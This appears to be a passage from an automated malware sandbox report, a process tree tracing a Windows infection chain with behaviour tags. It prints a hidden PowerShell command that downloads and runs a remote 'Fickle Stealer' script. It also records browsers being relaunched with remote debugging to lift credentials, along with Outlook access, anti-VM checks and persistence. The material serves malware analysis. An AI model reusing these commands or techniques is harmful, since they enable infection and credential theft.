        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\Admin\AppData\Local\Temp\10479800141\pDmELXs.ps1"
        6⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:5628
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -win Hidden -Command "Invoke-Command -ScriptBlock ([scriptblock]::Create((Invoke-RestMethod -Uri 'https://client-telemetry.com/hH773j/payload/fickle/payload.ps1')))"
        7⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:3372
        
        C:\Users\Admin\AppData\Local\Temp\Fickle Stealer\Browser Data\program.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Fickle Stealer\Browser Data\program.exe"
        8⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:2496
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM chrome.exe
        9⤵
        Kills process with taskkill
        
        PID:1256
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --remote-allow-origins=* --headless "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data"
        9⤵
        Uses browser remote debugging
        Enumerates system info in registry
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        Suspicious use of FindShellTrayWindow
        Suspicious use of WriteProcessMemory
        
        PID:5588
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9de28dcf8,0x7ff9de28dd04,0x7ff9de28dd10
        10⤵
        
        PID:5132
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --headless --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1984,i,17887973274031549053,4557818641347015986,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=1976 /prefetch:2
        10⤵
        
        PID:4500
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --field-trial-handle=2236,i,17887973274031549053,4557818641347015986,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2232 /prefetch:3
        10⤵
        
        PID:1880
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --field-trial-handle=2344,i,17887973274031549053,4557818641347015986,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2340 /prefetch:8
        10⤵
        
        PID:2820
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9222 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3212,i,17887973274031549053,4557818641347015986,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3208 /prefetch:1
        10⤵
        Uses browser remote debugging
        
        PID:4512
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9222 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3244,i,17887973274031549053,4557818641347015986,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3240 /prefetch:1
        10⤵
        Uses browser remote debugging
        
        PID:1124
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9222 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4252,i,17887973274031549053,4557818641347015986,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4248 /prefetch:2
        10⤵
        Uses browser remote debugging
        
        PID:4768
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9222 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4596,i,17887973274031549053,4557818641347015986,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4592 /prefetch:1
        10⤵
        Uses browser remote debugging
        
        PID:5028
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM chrome.exe
        9⤵
        Kills process with taskkill
        
        PID:2224
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM msedge.exe
        9⤵
        Kills process with taskkill
        
        PID:4004
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9222 --remote-allow-origins=* --headless "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data"
        9⤵
        Uses browser remote debugging
        Enumerates system info in registry
        Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        Suspicious use of FindShellTrayWindow
        
        PID:3260
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x23c,0x240,0x244,0x238,0x300,0x7ff9dae1f208,0x7ff9dae1f214,0x7ff9dae1f220
        10⤵
        
        PID:1208
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=2644,i,4990305468293964105,5838536694120044613,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=2640 /prefetch:3
        10⤵
        
        PID:5312
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --headless --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2592,i,4990305468293964105,5838536694120044613,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=2584 /prefetch:2
        10⤵
        
        PID:5180
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=2716,i,4990305468293964105,5838536694120044613,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=2708 /prefetch:8
        10⤵
        
        PID:6096
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --pdf-upsell-enabled --remote-debugging-port=9222 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3520,i,4990305468293964105,5838536694120044613,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=3504 /prefetch:1
        10⤵
        Uses browser remote debugging
        
        PID:4568
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --instant-process --pdf-upsell-enabled --remote-debugging-port=9222 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3556,i,4990305468293964105,5838536694120044613,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=3540 /prefetch:1
        10⤵
        Uses browser remote debugging
        
        PID:2592
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM msedge.exe
        9⤵
        Kills process with taskkill
        
        PID:5752
      - C:\Users\Admin\AppData\Local\Temp\10479900101\CmvdYC4.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10479900101\CmvdYC4.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:628
        
        C:\Users\Admin\AppData\Local\Temp\onefile_628_133884513523412558\ZSoeRVBe.exe
        
        C:\Users\Admin\AppData\Local\Temp\10479900101\CmvdYC4.exe
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:1208
      - C:\Users\Admin\AppData\Local\Temp\10480540101\ibC8xs1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10480540101\ibC8xs1.exe"
        6⤵
        Executes dropped EXE
        Adds Run key to start application
        Suspicious use of SetThreadContext
        
        PID:1244
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\zatv23mb\zatv23mb.cmdline"
        7⤵
        
        PID:4960
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESBF73.tmp" "c:\Users\Admin\AppData\Local\Temp\zatv23mb\CSC26A8B6CF163F4042BC29EF8329E3C758.TMP"
        8⤵
        
        PID:3020
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        7⤵
        Accesses Microsoft Outlook accounts
        Accesses Microsoft Outlook profiles
        Suspicious use of SetThreadContext
        Drops file in Program Files directory
        System Location Discovery: System Language Discovery
        Checks processor information in registry
        Suspicious behavior: EnumeratesProcesses
        outlook_office_path
        outlook_win_path
        
        PID:4708
        
        C:\Windows\system32\rundll32.exe
        
        "C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61
        8⤵
        Modifies registry class
        Suspicious use of FindShellTrayWindow
        
        PID:2592
        
        C:\Windows\system32\rundll32.exe
        
        "C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61
        8⤵
        Modifies registry class
        Suspicious use of FindShellTrayWindow
        
        PID:5192
        
        C:\Windows\system32\rundll32.exe
        
        "C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61
        8⤵
        
        PID:1524
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        --restore-last-session --remote-debugging-port=9223 --remote-allow-origins=* --headless "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --profile-directory="Default"
        8⤵
        Uses browser remote debugging
        
        PID:1224
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9e101dcf8,0x7ff9e101dd04,0x7ff9e101dd10
        9⤵
        
        PID:3792
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --field-trial-handle=2568,i,15727445684611582999,2238538521242380415,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2564 /prefetch:3
        9⤵
        
        PID:3452
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --headless --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2536,i,15727445684611582999,2238538521242380415,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2528 /prefetch:2
        9⤵
        
        PID:2036
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --field-trial-handle=2584,i,15727445684611582999,2238538521242380415,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2576 /prefetch:8
        9⤵
        
        PID:3952
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3240,i,15727445684611582999,2238538521242380415,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3136 /prefetch:1
        9⤵
        Uses browser remote debugging
        
        PID:6104
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3404,i,15727445684611582999,2238538521242380415,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3400 /prefetch:1
        9⤵
        Uses browser remote debugging
        
        PID:3680
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4068,i,15727445684611582999,2238538521242380415,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4064 /prefetch:2
        9⤵
        Uses browser remote debugging
        
        PID:3436
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4604,i,15727445684611582999,2238538521242380415,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4600 /prefetch:1
        9⤵
        Uses browser remote debugging
        
        PID:2088
        
        C:\Windows\system32\rundll32.exe
        
        "C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61
        8⤵
        
        PID:3368
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        --restore-last-session --remote-debugging-port=9225 --remote-allow-origins=* --headless "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default"
        8⤵
        Uses browser remote debugging
        
        PID:3480
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x20c,0x23c,0x240,0x208,0x2f0,0x7ff9dd79f208,0x7ff9dd79f214,0x7ff9dd79f220
        9⤵
        
        PID:1728
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=2764,i,657909540547836991,14887086765475164535,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=2760 /prefetch:3
        9⤵
        
        PID:4472
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --headless --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2712,i,657909540547836991,14887086765475164535,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=2704 /prefetch:2
        9⤵
        
        PID:828
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=2780,i,657909540547836991,14887086765475164535,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=2772 /prefetch:8
        9⤵
        
        PID:2988
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --instant-process --pdf-upsell-enabled --remote-debugging-port=9225 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3576,i,657909540547836991,14887086765475164535,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=3572 /prefetch:1
        9⤵
        Uses browser remote debugging
        
        PID:4492
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --pdf-upsell-enabled --remote-debugging-port=9225 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3524,i,657909540547836991,14887086765475164535,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=3520 /prefetch:1
        9⤵
        Uses browser remote debugging
        
        PID:4360
        
        C:\Windows\system32\rundll32.exe
        
        "C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61
        8⤵
        
        PID:5028
        
        C:\Windows\system32\rundll32.exe
        
        "C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61
        8⤵
        
        PID:6644
      - C:\Users\Admin\AppData\Local\Temp\10480910101\DgQBvwg.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10480910101\DgQBvwg.exe"
        6⤵
        Executes dropped EXE
        Adds Run key to start application
        Suspicious use of SetThreadContext
        
        PID:2008
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\cai4as0u\cai4as0u.cmdline"
        7⤵
        
        PID:5728
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESFD95.tmp" "c:\Users\Admin\AppData\Local\Temp\cai4as0u\CSC9DB8D454B355489D94A3ABE5BE83B1A5.TMP"
        8⤵
        
        PID:372
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:3820
      - C:\Windows\SysWOW64\msiexec.exe
        
        "C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\10481850271\ArFLIYD.msi" /quiet
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:4108
      - C:\Users\Admin\AppData\Local\Temp\10482110101\89164b9e19.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10482110101\89164b9e19.exe"
        6⤵
        
        PID:5732
      - C:\Users\Admin\AppData\Local\Temp\10482500101\pered.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10482500101\pered.exe"
        6⤵
        
        PID:2532
      - C:\Users\Admin\AppData\Local\Temp\10483150101\5Jq9U1v.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10483150101\5Jq9U1v.exe"
        6⤵
        
        PID:1608
      - C:\Users\Admin\AppData\Local\Temp\10484410101\PsafxoF.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10484410101\PsafxoF.exe"
        6⤵
        
        PID:6316
        
        C:\Users\Admin\AppData\Local\Temp\3114b4b57c\tgvazx.exe
        
        "C:\Users\Admin\AppData\Local\Temp\3114b4b57c\tgvazx.exe"
        7⤵
        
        PID:4452
      - C:\Users\Admin\AppData\Local\Temp\10484470101\4df86901dc.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10484470101\4df86901dc.exe"
        6⤵
        
        PID:1840
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        7⤵
        
        PID:6660
      - C:\Users\Admin\AppData\Local\Temp\10484480101\9a66af6c8a.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10484480101\9a66af6c8a.exe"
        6⤵
        
        PID:7872

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:1132

C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
1⤵
PID:4904

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
1⤵
PID:2460

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c explorer.exe C:\Users\Admin\AppData\Roaming\blv20gPs\exp.exe
1⤵
PID:1880
- C:\Windows\explorer.exe
  explorer.exe C:\Users\Admin\AppData\Roaming\blv20gPs\exp.exe
  2⤵
  PID:4736

C:\Windows\explorer.exe
C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
1⤵
PID:5072
- C:\Users\Admin\AppData\Roaming\blv20gPs\exp.exe
  "C:\Users\Admin\AppData\Roaming\blv20gPs\exp.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  PID:1968
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\pq2o3sk3\pq2o3sk3.cmdline"
    3⤵
    PID:4612
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD06A.tmp" "c:\Users\Admin\AppData\Local\Temp\pq2o3sk3\CSC8053ABF1C49849CEA4ED3A41FED21E.TMP"
      4⤵
      PID:6036
